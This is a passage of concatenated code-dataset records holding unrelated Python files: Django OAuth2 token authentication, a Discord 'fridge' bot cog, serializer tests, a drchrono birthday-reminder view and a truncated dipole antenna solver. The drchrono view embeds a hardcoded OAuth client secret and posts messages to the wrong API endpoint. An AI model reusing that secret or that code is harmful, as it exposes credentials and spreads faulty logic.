 def get_song_path(data, label):\n        file_path = QFileDialog().getOpenFileName(None, 'Choose a song', '', 'MP3 files (*.mp3);;WAV files (*.wav)')\n        if file_path[0] != '':\n            data['song_path'] = file_path[0]\n            label.setText(f'Song: {file_path[0]}')\n            label.setToolTip(file_path[0])\n        else:\n            label.setText('Song: No file selected')\n            data['song_path'] = None\n\n    @staticmethod\n    def show_custom_genre(combobox, grid, custom_input):\n        if combobox.currentText() == 'Custom':  # Add an input if the genre 'Custom' is selected\n            return grid.addWidget(custom_input, 9, 
1)\n","sub_path":"src/gui/tabmanager.py","file_name":"tabmanager.py","file_ext":"py","file_size_in_byte":1193,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"497560180","text":"import uuid\nfrom decimal import Decimal\n\nimport pytest\n\nfrom django.utils import timezone\n\nfrom work_at_olist.serializers import TelephoneBillSerializer\n\n\npytestmark = [pytest.mark.django_db, pytest.mark.serial]\n\n\ndef test_should_serialize_telephone_bill(telephone_bill):\n # GIVEN\n # WHEN\n serializer = TelephoneBillSerializer(telephone_bill)\n\n # THEN\n assert isinstance(serializer.data, dict)\n assert serializer.data.get('destination') == '48984359051'\n assert serializer.data.get('call_start_time') == '06:00:00'\n assert serializer.data.get('call_duration') == '0:02:46.956000'\n assert serializer.data.get('call_price') == '0.54'\n\n\ndef test_should_deserialize_telephone_bill():\n # GIVEN\n call_id = uuid.uuid4()\n telephone_bill_data = {\n 'call_id': call_id,\n 'destination': '48984359051',\n 'call_start_date': timezone.now(),\n 'call_start_time': '06:00:00',\n 'call_duration': '0:02:46.956000',\n 'call_price': '0.54',\n }\n\n # WHEN\n serializer = TelephoneBillSerializer(data=telephone_bill_data)\n\n # THEN\n assert serializer.is_valid()\n\n telephone_bill = serializer.validated_data\n assert telephone_bill['destination'] == '48984359051'\n assert telephone_bill['call_start_time'] == '06:00:00'\n assert telephone_bill['call_duration'] == '0:02:46.956000'\n assert telephone_bill['call_price'] == Decimal('0.54')\n","sub_path":"work_at_olist/tests/test_telephone_bill_serializer.py","file_name":"test_telephone_bill_serializer.py","file_ext":"py","file_size_in_byte":1412,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"318538913","text":"import logging\nfrom hashlib import sha256\nfrom urlparse import parse_qsl\n\nfrom django.http import HttpResponse\nfrom django.utils import simplejson\n\nfrom . import settings\nfrom . import constants\nfrom .models import Token\nfrom .utils import TimestampGenerator\nfrom .exceptions import InvalidRequest, InvalidToken, InsufficientScope\n\nlog = logging.getLogger(__name__)\n\ndef authenticate(request):\n authentication_method = None\n \n if 'HTTP_AUTHORIZATION' in request.META:\n auth = request.META['HTTP_AUTHORIZATION'].split()\n authentication_method = auth[0].lower()\n \n if authentication_method == 'bearer':\n access_token = ' '.join(auth[1:]).strip()\n \n elif authentication_method == 'mac':\n mac_header = ' '.join(auth[1:]).strip()\n \n else:\n access_token = request.REQUEST.get('access_token')\n if access_token is not None:\n authentication_method = 'bearer'\n \n if authentication_method is None:\n raise InvalidRequest('No authentication credentials provided.')\n \n if authentication_method not in ['bearer', 'mac']:\n raise InvalidRequest('Authentication method \"%s\" is not supported.' 
% authentication_method)\r\n    \r\n    token = None\r\n    now = TimestampGenerator()()\r\n    \r\n    if authentication_method == 'bearer':\r\n        if settings.AUTHENTICATION_METHOD & constants.BEARER == 0:\r\n            raise InvalidToken('Bearer authentication is not supported.')\r\n        \r\n        try:\r\n            token = Token.objects.get(access_token=access_token)\r\n        \r\n        except Token.DoesNotExist:\r\n            raise InvalidToken('Token doesn\\'t exist')\r\n    \r\n    elif authentication_method == 'mac':\r\n        if settings.AUTHENTICATION_METHOD & constants.MAC == 0:\r\n            raise InvalidToken('MAC authentication is not supported.')\r\n        \r\n        request_hostname = request.META.get('REMOTE_HOST')\r\n        if request_hostname is None:\r\n            raise InvalidRequest('Request does not contain a hostname.')\r\n        \r\n        request_port = request.META.get('SERVER_PORT')\r\n        if request_port is None:\r\n            raise InvalidRequest('Request does not contain a port.')\r\n        \r\n        request_method = request.method.upper()\r\n        \r\n        mac_header = parse_qsl(mac_header.replace(',', '&').replace('\"', ''))\r\n        mac_header = dict([(x[0].strip(), x[1].strip()) for x in mac_header])\r\n        for parameter in ['id', 'nonce', 'mac']:\r\n            if parameter not in mac_header:\r\n                raise InvalidToken('MAC Authorization header does not contain required parameter \"%s\"' % parameter)\r\n        if 'bodyhash' in mac_header:\r\n            bodyhash = mac_header['bodyhash']\r\n        else:\r\n            bodyhash = ''\r\n        if 'ext' in mac_header:\r\n            ext = mac_header['ext']\r\n        else:\r\n            ext = ''\r\n        \r\n        nonce_timestamp, nonce_string = mac_header['nonce'].split(':')\r\n        mac = sha256('\\n'.join([\r\n            mac_header['nonce'], # The nonce value generated for the request\r\n            request_method, # The HTTP request method \r\n            'XXX', # The HTTP request-URI\r\n            request_hostname, # The hostname included in the HTTP request\r\n            request_port, # The port as included in the HTTP request\r\n            bodyhash,\r\n            ext\r\n        ])).hexdigest()\r\n        \r\n        log.debug('%s %s %s' % (nonce_timestamp, nonce_string, mac))\r\n        raise NotImplementedError()\r\n        \r\n        # TODO:\r\n        # 1.  Recalculate the request body hash (if included in the request) as\r\n        #     described in Section 3.2 and request MAC as described in\r\n        #     Section 3.3 and compare the request MAC to the value received\r\n        #     from the client via the \"mac\" attribute.\r\n        # 2.  Ensure that the combination of nonce and MAC key identifier\r\n        #     received from the client has not been used before in a previous\r\n        #     request (the server MAY reject requests with stale timestamps;\r\n        #     the determination of staleness is left up to the server to\r\n        #     define).\r\n        # 3.  Verify the scope and validity of the MAC credentials.\r\n\r\n    if token.expire < now:\r\n        raise InvalidToken('Token is expired')\r\n    \r\n    return (token.user, token.scopes.all())\r\n\r\ndef has_scope_name(scope_name, scopes):\r\n    scope_names = set([ scope.name for scope in scopes ])\r\n    return scope_name in scope_names\r\n\r\ndef error_response(exception, content='', content_type=None):\r\n    '''\r\n    Error response generator. Returns an HttpResponse object with status code\r\n    400/401/403 and the appropriate headers set.\r\n\r\n    **Kwargs:**\r\n    * *content:* See Django docs. *Default ''*\r\n    * *content_type:* See Django docs. 
*Default DEFAULT_CONTENT_TYPE*\n '''\n if content_type:\n response = HttpResponse(content, content_type=content_type)\n else:\n response = HttpResponse(content)\n \n if exception is None:\n response['WWW-Authenticate'] = 'Bearer realm=\"%s\"' % settings.REALM\n response.status_code = 401\n return response\n\n else:\n error = getattr(exception, 'error', 'invalid_request')\n error_description = exception.message\n \n header = [\n 'Bearer realm=\"%s\"' % settings.REALM,\n 'error=\"%s\"' % error,\n 'error_description=\"%s\"' % error_description\n ]\n \n if isinstance(exception, InsufficientScope):\n header.append('scope=%s' % exception.required_scope)\n response.status_code = 403\n \n elif isinstance(exception, InvalidToken):\n response.status_code = 401\n \n elif isinstance(exception, InvalidRequest):\n response.status_code = 400\n \n else:\n response.status_code = 401\n \n response['WWW-Authenticate'] = ', '.join(header)\n \n return response\n\ndef json_error_response(exception):\n '''\n Returns an HttpResponse object of JSON error data.\n '''\n if exception is None:\n content = ({\n 'error': 'invalid_request',\n 'error_description': 'Invalid request.'\n })\n \n else:\n content = ({\n 'error': getattr(exception, 'error', 'invalid_request'),\n 'error_description': exception.message\n })\n \n return error_response(\n exception,\n content=simplejson.dumps(content),\n content_type='application/json'\n )\n","sub_path":"oauth2/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":6405,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"588947028","text":"#Standard Imports\nimport logging\nimport random\nfrom typing import Union\n\n#Discord Imports\nimport discord\n\n#Redbot Imports\nfrom redbot.core import commands, checks, Config\n\nfrom typing import cast\nimport json\nfrom pathlib import Path\n\nfrom collections import Counter, defaultdict\n\n\nfrom redbot.core.data_manager import cog_data_path\n\n\nfrom fuzzywuzzy import process\n\n__version__ = \"1.1.0\"\n__author__ = \"oranges\"\n\nlog = logging.getLogger(\"red.oranges_fridge\")\n\nBaseCog = getattr(commands, \"Cog\", object)\n\nclass Fridge(BaseCog):\n \"\"\"\n Add stuff to the fridge\n \"\"\"\n def __init__(self, bot):\n self.bot = bot\n self.config = Config.get_conf(self, identifier=672261474290237490, force_registration=True)\n default_guild = {\n \"fridge\": None,\n \"items\": [\"Banana\", \"Milk\", \"Bread\", \"Butter\", \"Chocolate\", \"Chocolate Milk\", \"Brussel sprouts, yuck!!\", \"A half eaten ham sandwich\"],\n }\n self.config.register_guild(**default_guild)\n self.fridges = defaultdict(Counter)\n\n\n datapath = cog_data_path(self)\n for guild in self.bot.guilds:\n filename = Path(datapath, f\"{guild.id}.json\")\n if filename.exists():\n log.info(f\"Loading backing store {filename}\")\n with open(filename, 'r') as backingstore:\n storeditems = json.load(backingstore)\n fridge = self.fridges[guild]\n for item in storeditems:\n fridge[item] +=1\n\n \n def cog_unload(self):\n datapath = cog_data_path(self)\n for guild in self.fridges.keys():\n fridge = self.fridges[guild]\n storeditems = list()\n for key in fridge.keys():\n count = fridge[key]\n for _ in range(count):\n storeditems.append(key)\n filename = Path(datapath, f\"{guild.id}.json\")\n \n log.info(f\"Writing backing store {filename}\")\n with open(filename, 'w') as backingstore:\n json.dump(storeditems, backingstore)\n\n log.info(\"Unloading\")\n\n @commands.guild_only()\n @commands.group()\n async 
def fridge(self,ctx):\n \"\"\"\n Fridge commands\n \"\"\"\n pass\n \n @commands.guild_only()\n @checks.mod_or_permissions(administrator=True)\n @fridge.group()\n async def buyables(self,ctx):\n \"\"\"\n Buyable item commands\n \"\"\"\n pass\n\n @fridge.command(aliases=['check'])\n async def current(self, ctx):\n \"\"\"\n Who is currently on the fridge\n \"\"\"\n user = await self.config.guild(ctx.guild).fridge()\n if user:\n await ctx.send(f\"{user} is currently on top of the fridge\")\n else:\n await ctx.send(f\"You look up on the top of the fridge but there is only dust\")\n\n @fridge.command()\n async def put(self, ctx, member: discord.Member):\n \"\"\"\n Put this person on the fridge\n \"\"\"\n user = await self.config.guild(ctx.guild).fridge.set(member.name)\n await ctx.send(f\"{member.mention} has been put on top of the fridge\")\n\n @fridge.command()\n async def add(self, ctx, *, item):\n \"\"\"\n Put something in the fridge\n \"\"\"\n if(\"@\" in item):\n await ctx.send(f\"Nice try\") \n return\n \n if(len(item) > 100):\n await ctx.send(f\"This is too big to fit in the fridge\") \n return\n \n if(item.count('\\n') > 5):\n await ctx.send(f\"This is too spammy to fit in the fridge\")\n return\n\n fridge = self.fridges[ctx.guild]\n fridge[item]+=1\n await ctx.send(f\"You put {item} in the fridge\")\n\n config = self.config.guild(ctx.guild)\n async with config.items() as items:\n if item not in items:\n items.append(item)\n\n @fridge.command(aliases=['take', 'remove', 'find', 'eat'])\n async def get(self, ctx, *, search=None):\n \"\"\"\n Get a random item out of the fridge\n \"\"\"\n fridge = self.fridges[ctx.guild]\n \n if(len(fridge) <= 0):\n await ctx.send(f\"There's nothing in the fridge, you should use restock to refill it!\")\n return\n\n if search:\n item = process.extractOne(search, list(fridge.keys()), score_cutoff=80)\n if not item:\n await ctx.send(f\"You don't seem to have anything you want, maybe get some and add?\")\n return\n item = item[0]\n\n \n else:\n item = random.choice(list(fridge.keys()))\n \n fridge[item] -= 1\n if fridge[item] <= 0:\n del(fridge[item])\n await ctx.send(f\"You take the last {item}, enjoy!\")\n return\n\n await ctx.send(f\"You take out {item}, enjoy!\")\n\n\n @fridge.command()\n async def peek(self, ctx, *, search=None):\n \"\"\"\n Peek into the fridge, specify a search to find certain types of items\n \"\"\"\n fridge = self.fridges[ctx.guild]\n items = fridge.keys()\n if(len(items) <= 0):\n await ctx.send(f\"Bored, you open your fridge only to find there's nothing there!, use restock to refill your fridge\")\n return\n\n spotted = list()\n if search:\n fuzzy_matches = process.extract(search, list(fridge.keys()), limit=30)\n for match in fuzzy_matches:\n if match[1] > 80:\n spotted.append(match[0])\n else:\n sample = min(10, len(items))\n spotted = random.sample(items, sample)\n \n if len(spotted) <= 0:\n await ctx.send(f\"You couldn't really find anything like that\")\n return\n \n output = list()\n\n for item in spotted:\n if fridge[item] > 1:\n output.append(\"{0} {1}\".format(fridge[item], item))\n else:\n output.append(f\"The last {item}\")\n await ctx.send(f\"Bored, you open your fridge and stare into it for a few minutes and you see: {', '.join(output)}\")\n\n @fridge.command()\n async def restock(self, ctx, amount=100):\n \"\"\"\n Refill your fridge with a shopping session\n \"\"\"\n items = list(set(await self.config.guild(ctx.guild).items()))\n fridge = self.fridges[ctx.guild]\n for _ in range(amount):\n 
fridge[random.choice(items)]+=1\n\n await ctx.send(f\"You had a productive shopping session and the fridge is now teeming with items\")\n\n\n @fridge.command()\n async def tip(self, ctx):\n message = f\"Holy shit {ctx.author.mention} just straight up tipped the fridge over\"\n amount = random.randint(1, 10)\n fridge = self.fridges[ctx.guild]\n items = list(fridge.keys())\n sample = min(amount, len(items))\n spilled_out = random.sample(items, sample)\n if len(spilled_out) >= 1:\n print(spilled_out)\n message += \" items go flying everywhere!\"\n else:\n message += \" but nothing came out, lucky!\"\n for spilled in spilled_out:\n \n lost = random.randint(1, fridge[spilled])\n if lost == 1:\n message += f\" one {spilled} gets scattered across the floor,\"\n else:\n message += f\" {lost} {spilled} get scattered across the floor,\"\n fridge[spilled]-=lost\n if fridge[spilled] <= 0:\n del(fridge[spilled])\n user = await self.config.guild(ctx.guild).fridge()\n if user:\n message += f\" {user} is sent flying from the top of the fridge\"\n await self.config.guild(ctx.guild).fridge.set(None)\n await ctx.send(message)\n\n @buyables.command()\n async def remove(self, ctx, *, item):\n \"\"\"\n Remove an item from the buyable store\n \"\"\"\n items = await self.config.guild(ctx.guild).items()\n if item in items:\n items.remove(item)\n items = await self.config.guild(ctx.guild).items.set(items)\n await ctx.send(f\"{item} has been removed from the Buyables\")\n\n\n @buyables.command()\n @checks.mod_or_permissions(administrator=True)\n async def clear(self, ctx):\n \"\"\"\n Clear all buyable items\n \"\"\"\n self.fridges[ctx.guild] = Counter()\n \n await self.config.guild(ctx.guild).items.set([\"Banana\", \"Milk\", \"Milk\", \"Bread\", \"Butter\", \"Chocolate\", \"Chocolate Milk\", \"Brussel sprouts, yuck!!\", \"A half eaten ham sandwich\"])\n await ctx.send(f\"Buyables has been cleared\")\n\n @buyables.command()\n @checks.mod_or_permissions(administrator=True)\n async def deduplicate(self, ctx):\n \"\"\"\n Remove duplicate buyable items added in earlier versions\n \"\"\"\n items = await self.config.guild(ctx.guild).items()\n setitems = set(items)\n final = list(setitems) \n items = await self.config.guild(ctx.guild).items.set(final)\n await ctx.send(f\"Buyables deduplicated\")\n \n \n @buyables.command()\n @checks.mod_or_permissions(administrator=True)\n async def dump(self, ctx):\n \"\"\"\n Dump all buyables, inadvisable to use in normal circumstances\n \"\"\"\n items = await self.config.guild(ctx.guild).items()\n await ctx.send(\",\".join(items))","sub_path":"fridge/fridge.py","file_name":"fridge.py","file_ext":"py","file_size_in_byte":9384,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"528184374","text":"#!/bin/python3\nimport numpy\n\ndef pad(m):\n #add first column to the end and last column to the front\n first_col = numpy.array([m[:,0]]).T\n last_col = numpy.array([m[:,-1]]).T\n temp = numpy.hstack((last_col, m, first_col))\n\n #flip top and bottom rows of original matrix, pad with 0's\n top_row = numpy.insert(m[-1,:], 0, 0)\n top_row = numpy.append(top_row, 0)\n bottom_row = numpy.insert(m[0,:], 0, 0)\n bottom_row = numpy.append(bottom_row,0)\n pad = numpy.vstack((top_row, temp, bottom_row))\n\n return pad\n","sub_path":"hw6/pad.py","file_name":"pad.py","file_ext":"py","file_size_in_byte":534,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"406047225","text":"from django.shortcuts 
import render\nfrom django.http import HttpResponse\nimport requests\nimport datetime\nimport pytz\nimport time\nfrom threading import Lock\nfrom threading import Thread\n\ndef index(request):\n\tif (hasattr(Polling, 'authorized')):\n\t\treturn HttpResponse(\"Birthday reminder already started - next congrats sending \" + str(Polling.next_sending))\n\tdict = request.GET.dict()\n\tif ('error' in dict):\n\t\traise ValueError('Error authorizing application: ' + dict['error'])\n\tif ('code' in dict):\n\t\tresponse = requests.post('https://drchrono.com/o/token/', data={\n\t\t\t'code': dict['code'],\n\t\t\t'grant_type': 'authorization_code',\n\t\t\t'redirect_uri': 'http://127.0.0.1:8000/polls/',\n\t\t\t'client_id': 'Jtb0qgryKJiXx79yGEAcJsSVUVM4C7dETBvKXHOa',\n\t\t\t'client_secret': 'D4EIENj5b5aSpkRbhoNgXVihtMCqy8QzTFi83yKgLzQlqJSpcb6DZgM8P8MZiK0B74LGAtNSw9sPsAJdTsXm90tkcoGX1paa8bYovnl5axPcppXjSLhUTcwKl8NsN7iJ',\n\t\t})\n\t\tresponse.raise_for_status()\n\t\tdata = response.json()\n\t\twrapper = Polling()\n\t\twrapper.lock = Lock()\n\t\twrapper.access_token = data['access_token']\n\t\twrapper.refresh_token = data['refresh_token']\n\t\twrapper.timeout = data['expires_in']\n\t\tthread = Thread(target = wrapper.poll)\n\t\tthread.start()\n\t\tthread = Thread(target = wrapper.reauth)\n\t\tthread.start()\n\t\tPolling.authorized = True\n\t\treturn HttpResponse(\"Birthday reminder successfully started\")\n\n\treturn HttpResponse(\"Login with drchrono\")\n\nclass Polling:\n\tdef poll(self):\n\t\twhile True:\n\t\t\tself.lock.acquire()\n\t\t\theaders = {\n\t\t\t\t'Authorization': 'Bearer ' + self.access_token,\n\t\t\t}\n\n\t\t\tpatients = []\n\t\t\tpatients_url = 'https://drchrono.com/api/patients'\n\t\t\twhile patients_url:\n\t\t\t\tdata = requests.get(patients_url, headers=headers).json()\n\t\t\t\tpatients.extend(data['results'])\n\t\t\t\tpatients_url = data['next']\n\t\t\tfor patient in patients:\n\t\t\t\tif ('date_of_birth' in patient):\n\t\t\t\t\tbirth = str(patient['date_of_birth'])\n\t\t\t\t\tbirth = birth[5:10]\n\t\t\t\t\tnow = str(datetime.datetime.now(pytz.utc))\n\t\t\t\t\tnow = now[5:10]\n\t\t\t\t\tif birth == now:\n\t\t\t\t\t\tself.send_mail(patient)\n\t\t\tself.lock.release()\n\t\t\tPolling.next_sending = datetime.datetime.now(pytz.utc) + datetime.timedelta(seconds=86400)\n\t\t\ttime.sleep(86400)\n\n\n\tdef reauth(self):\n\t\twhile True:\n\t\t\tself.lock.acquire()\n\t\t\tresponse = requests.post('https://drchrono.com/o/token/', data={\n\t\t\t\t'refresh_token': self.refresh_token,\n\t\t\t\t'grant_type': 'refresh_token',\n\t\t\t\t'client_id': 'Jtb0qgryKJiXx79yGEAcJsSVUVM4C7dETBvKXHOa',\n\t\t\t\t'client_secret': 'D4EIENj5b5aSpkRbhoNgXVihtMCqy8QzTFi83yKgLzQlqJSpcb6DZgM8P8MZiK0B74LGAtNSw9sPsAJdTsXm90tkcoGX1paa8bYovnl5axPcppXjSLhUTcwKl8NsN7iJ',\n\t\t\t})\n\t\t\tresponse.raise_for_status()\n\t\t\tdata = response.json()\n\t\t\t# Store the refreshed credentials on the instance so poll() picks them up\n\t\t\tself.access_token = data['access_token']\n\t\t\tself.refresh_token = data['refresh_token']\n\t\t\tself.timeout = data['expires_in']\n\t\t\tself.lock.release()\n\t\t\t# Sleep until shortly before the token expires instead of refreshing in a tight loop\n\t\t\ttime.sleep(max(self.timeout - 60, 60))\n\n\tdef send_mail(self, patient):\n\t\theaders = {\n\t\t\t'Authorization': 'Bearer ' + self.access_token,\n\t\t}\n\t\tresponse = requests.post('https://drchrono.com/api/patients', headers=headers, data={\n\t\t\t'doctor': patient['doctor'],\n\t\t\t'title': 'Happy birthday, dear ' + patient['first_name'],\n\t\t\t'patient': patient['id'],\n\t\t\t'type': 'OD'\n\t\t})\n\t\tassert response.status_code == 
201\r\n","sub_path":"polls/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3320,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"296861592","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Nov 19 09:29:37 2019\r\n\r\n@author: henke\r\n\"\"\"\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport scipy.integrate as integrate\r\nfrom numpy.linalg import inv\r\nfrom tkinter import *\r\n\r\n# =============================================================================\r\n\r\nwindow = Tk()\r\nwindow.title(\"Near Field Parameters\")\r\nwindow.configure(background = \"#FFFFAA\")\r\n\r\n\r\n\r\n# ========================number of unknowns===================================\r\n \r\n#label_1 = Label(window, text = \"Number of unknowns in the system (31): \", bg = \"#FFFFAA\", font = \"Ariel\")\r\n#nun = StringVar()\r\n#entry_1 = Entry(window, textvariable = nun)\r\n\r\n#label_1.grid(row = 0, sticky = E)\r\n#entry_1.grid(row = 0, column = 1)\r\n\r\ndef execute():\r\n#    print(nun.get())\r\n    onbekendes = nun.get()\r\n    \r\n    \r\n    return(onbekendes)\r\n\r\n\r\n\r\n# ==========================Feed Voltage=======================================\r\n\r\nlabel_2 = Label(window, text = \"Antenna Feed voltage: \", bg = \"#FFFFAA\", font = \"Ariel\")\r\nfv = StringVar()\r\nentry_2 = Entry(window, textvariable = fv)\r\n\r\nlabel_2.grid(row = 1, sticky = E)\r\nentry_2.grid(row = 1, column = 1)\r\n\r\ndef execute1():\r\n#    print(nun.get())\r\n    onbekendes = fv.get()\r\n    \r\n    \r\n    return(onbekendes)\r\n\r\n# ===============================Frequency=====================================\r\n\r\nlabel_3 = Label(window, text = \"Frequency in GHz: \", bg = \"#FFFFAA\", font = \"Ariel\")\r\nfreQ = StringVar()\r\nentry_3 = Entry(window, textvariable = freQ)\r\n\r\nlabel_3.grid(row = 2, sticky = E)\r\nentry_3.grid(row = 2, column = 1)\r\n\r\ndef execute2():\r\n#    print(nun.get())\r\n    onbekendes = freQ.get()\r\n    \r\n    \r\n    return(onbekendes)\r\n\r\n# ==============================Length half dipole=============================\r\n\r\nlabel_4 = Label(window, text = \" Half of dipole length (0.2242 Lamda): \", bg = \"#FFFFAA\", font = \"Ariel\")\r\nlengt = StringVar()\r\nentry_4 = Entry(window, textvariable = lengt)\r\n\r\nlabel_4.grid(row = 3, sticky = E)\r\nentry_4.grid(row = 3, column = 1)\r\n\r\ndef execute3():\r\n#    print(nun.get())\r\n    onbekendes = lengt.get()\r\n    \r\n    \r\n    return(onbekendes)    \r\n\r\n\r\n# =============================Radius of dipole================================\r\n    \r\nlabel_5 = Label(window, text = \"Radius of Dipole (0.005 lambda): \", bg = \"#FFFFAA\", font = \"Ariel\")\r\nraD = StringVar()\r\nentry_5 = Entry(window, textvariable = raD)\r\n\r\nlabel_5.grid(row = 4, sticky = E)\r\nentry_5.grid(row = 4, column = 1)\r\ndef execute4():\r\n#    print(nun.get())\r\n    onbekendes = raD.get()\r\n    \r\n    \r\n    return(onbekendes)\r\n\r\n\r\n# =============================Wave Impedance==================================\r\n    \r\n#label_6 = Label(window, text = \"Wave Impedance in free space(ohms): \", bg = \"#FFFFAA\", font = \"Ariel\")\r\n#wi = StringVar()\r\n#entry_6 = Entry(window, textvariable = wi)\r\n\r\n#label_6.grid(row = 5, sticky = E)\r\n#entry_6.grid(row = 5, column = 1)\r\n\r\n#def execute5():\r\n#    #print(nun.get())\r\n#    onbekendes = wi.get()\r\n#    \r\n#    \r\n#    return(onbekendes)\r\n\r\n\r\n# =============================free space permittivity===========================\r\n\r\n#label_7 = Label(window, text = 
\"Free space permittivity (F/m): \")\r\n#Eps = StringVar()\r\n#entry_7 = Entry(window, textvariable = Eps)\r\n#\r\n#label_7.grid(row = 6, sticky = E)\r\n#entry_7.grid(row = 6, column = 1)\r\n#\r\n#def execute6():\r\n## print(nun.get())\r\n# onbekendes = Eps.get()\r\n# \r\n# \r\n# return(onbekendes)\r\n#\r\n\r\n \r\n# =============================feedpoifloat(Zg1)nt=======================================\r\n \r\n#label_8 = Label(window, text = \"Feed point of the antenna (zg=0 for Center-fed): \", bg = \"#FFFFAA\", font = \"Ariel\")\r\n#zG = StringVar()\r\n#entry_8 = Entry(window, textvariable = zG)\r\n\r\n#label_8.grid(row = 7, sticky = E)\r\n#entry_8.grid(row = 7, column = 1)\r\n\r\ndef execute7():\r\n# print(nun.get())\r\n onbekendes = zG.get()\r\n \r\n \r\n return(onbekendes)\r\n\r\n# =============================================================================\r\n# =============================================================================\r\n\r\nbutton_1 = Button(window, text = \"Run\", command = window.destroy )\r\nbutton_1.grid(row = 8, column = 1)\r\n\r\n \r\n \r\n# =============================================================================\r\nwindow.mainloop()\r\n\r\n#1\r\n#onb = execute()\r\ngnunkns = 31\r\n#rint('Unknowns: ',gnunkns)\r\n\r\n\r\n#2\r\nfv1 = execute1()\r\nFV = float(fv1)\r\nprint('Feed Voltage: ',FV)\r\n\r\n#3\r\nfreq1 = execute2()\r\nFreq = (float(freq1) * (10**9))\r\nprint('Frequency: ',Freq)\r\n\r\n#4\r\nlength1 = execute3()\r\nLen = float(length1)\r\nprint('Length of dipole: ',Len)\r\n\r\n#5\r\nrad1 = execute4()\r\nRad = float(rad1)\r\nprint('Radius of dipole: ',Rad)\r\n\r\n#6\r\n#wi1 = execute5()\r\nWI = 377\r\n#print('Wave Impedance: ',WI)\r\n\r\n##7\r\n#eps1 = execute6()\r\n#EPS = float(eps1)\r\n#print('Free space permittivit: ',EPS)\r\n\r\n#8\r\n#Zg1 = execute7()\r\nZG1 = 0\r\n#print('Feed point of the antenna (zg=0 for Center-fed): ',ZG)\r\n\r\nFreq1 = (float(Freq/10**9))\r\n\r\n\r\n# =============================================================================\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n# ==================### RMHVECTOR ###==========================================\r\ndef rmhvector(rx,ry,rz,p):\r\n \r\n rmhx = (rx[p+1]+rx[p])/2\r\n rmhy = (ry[p+1]+ry[p])/2\r\n rmhz = (rz[p+1]+rz[p])/2\r\n \r\n return(rmhx,rmhy,rmhz)\r\n# =============================================================================\r\n# ==================### SUNIT ###==============================================\r\ndef sunit(rx,ry,rz,p):\r\n \r\n rx1 = rx[p+1]\r\n ry1 = ry[p+1]\r\n rz1 = rz[p+1]\r\n rx2 = rx[p]\r\n ry2 = ry[p]\r\n rz2 = rz[p]\r\n rmag = np.sqrt((rx1 - rx2)**2 + (ry1 - ry2)**2 + (rz1 - rz2)**2)\r\n snx = (rx1 - rx2)/rmag\r\n sny = (ry1 - ry2)/rmag\r\n snz = (rz1 - rz2)/rmag\r\n\r\n return(snx, sny, snz, rmag)\r\n \r\n# =============================================================================\r\n# =========================## SCALARFUN ##===================================\r\ndef scalarfun(rx, ry, rz, wk, rad, m, n, del1): #Needs to be finished\r\n \r\n rmx = rx[m]\r\n rmy = ry[m]\r\n rmz = rz[m]\r\n \r\n if (del1 == 0.5):\r\n rnx = rx[n]\r\n rny = ry[n]\r\n rnz = rz[n]\r\n (sx1, sy1, sz1, rmag) = sunit(rx, ry, rz, n)\r\n \r\n elif (del1 == -0.5):\r\n (rnx, rny, rnz) = rmhvector(rx,ry,rz,n-1)\r\n (sx1, sy1, sz1, rmag) = sunit(rx, ry, rz, n-1)\r\n \r\n delta2 = rmag/2.0\r\n \r\n if (m==n):\r\n def F(s,rmx,rnx,wk,sx1,rmy,rny,sy1,rmz,rnz,sz1,rad):\r\n return(np.exp(-1j*wk*np.sqrt((rmx-rnx - s*sx1)**2 + (rmy - rny - s*sy1)**2 + (rmz - rnz - s*sz1)**2 + 
rad**2))/np.sqrt((rmx - rnx - s*sx1)**2 + (rmy - rny - s*sy1)**2 + (rmz - rnz - s*sz1)**2 + rad**2))\r\n psi = integrate.quad(F, 0, delta2,(rmx,rnx,wk,sx1,rmy,rny,sy1,rmz,rnz,sz1,rad))\r\n \r\n# F = np.exp(-1j*wk*np.sqrt((rmx-rnx - s*sx1)**2 + (rmy - rny - s*sy1)**2 + (rmz - rnz - s*sz1)**2 + rad**2))/np.sqrt((rmx - rnx - s*sx1)**2 + (rmy - rny - s*sy1)**2 + (rmz - rnz - s*sz1)**2 + rad**2)\r\n\r\n elif (m!=n):\r\n def F(s,rmx,rnx,wk,sx1,rmy,rny,sy1,rmz,rnz,sz1,rad):\r\n return(np.exp(-1j*wk*np.sqrt((rmx-rnx - s*sx1)**2 + (rmy - rny - s*sy1)**2 + (rmz - rnz - s*sz1)**2 + rad**2))/np.sqrt((rmx - rnx - s*sx1)**2 + (rmy - rny - s*sy1)**2 + (rmz - rnz - s*sz1)**2 + rad**2))\r\n psi = integrate.quad(F, 0, delta2,(rmx,rnx,wk,sx1,rmy,rny,sy1,rmz,rnz,sz1,rad))\r\n\r\n return(psi[0])\r\n \r\n \r\n# =============================================================================\r\n# \r\n# =======================## SCALARPOT ##=======================================\r\ndef scalarpot(rx, ry, rz, wk, rad, m, del1, n, q):\r\n \r\n rnx = rx[n]\r\n rny = ry[n]\r\n rnz = rz[n]\r\n \r\n rnx2 = rx[q]\r\n rny2 = ry[q]\r\n rnz2 = rz[q]\r\n \r\n (sx1, sy1, sz1, rmag) = sunit(rx, ry, rz, n)\r\n if (del1 == 0.5):\r\n (rmx, rmy, rmz) = rmhvector(rx, ry, rz, m)\r\n \r\n elif (del1 == -0.5):\r\n (rmx, rmy, rmz) = rmhvector(rx, ry, rz, m-1)\r\n \r\n delta = rmag\r\n# delta2=delta/2\r\n \r\n \r\n dist1 = np.sqrt((rmx - rnx)**2 + (rmy - rny)**2 + (rmz - rnz)**2)\r\n dist2 = np.sqrt((rmx - rnx2)**2 + (rmy - rny2)**2 + (rmz - rnz2)**2)\r\n \r\n if ((dist1 < delta) & (dist2 < delta)): #possible problem with comparisons\r\n# def 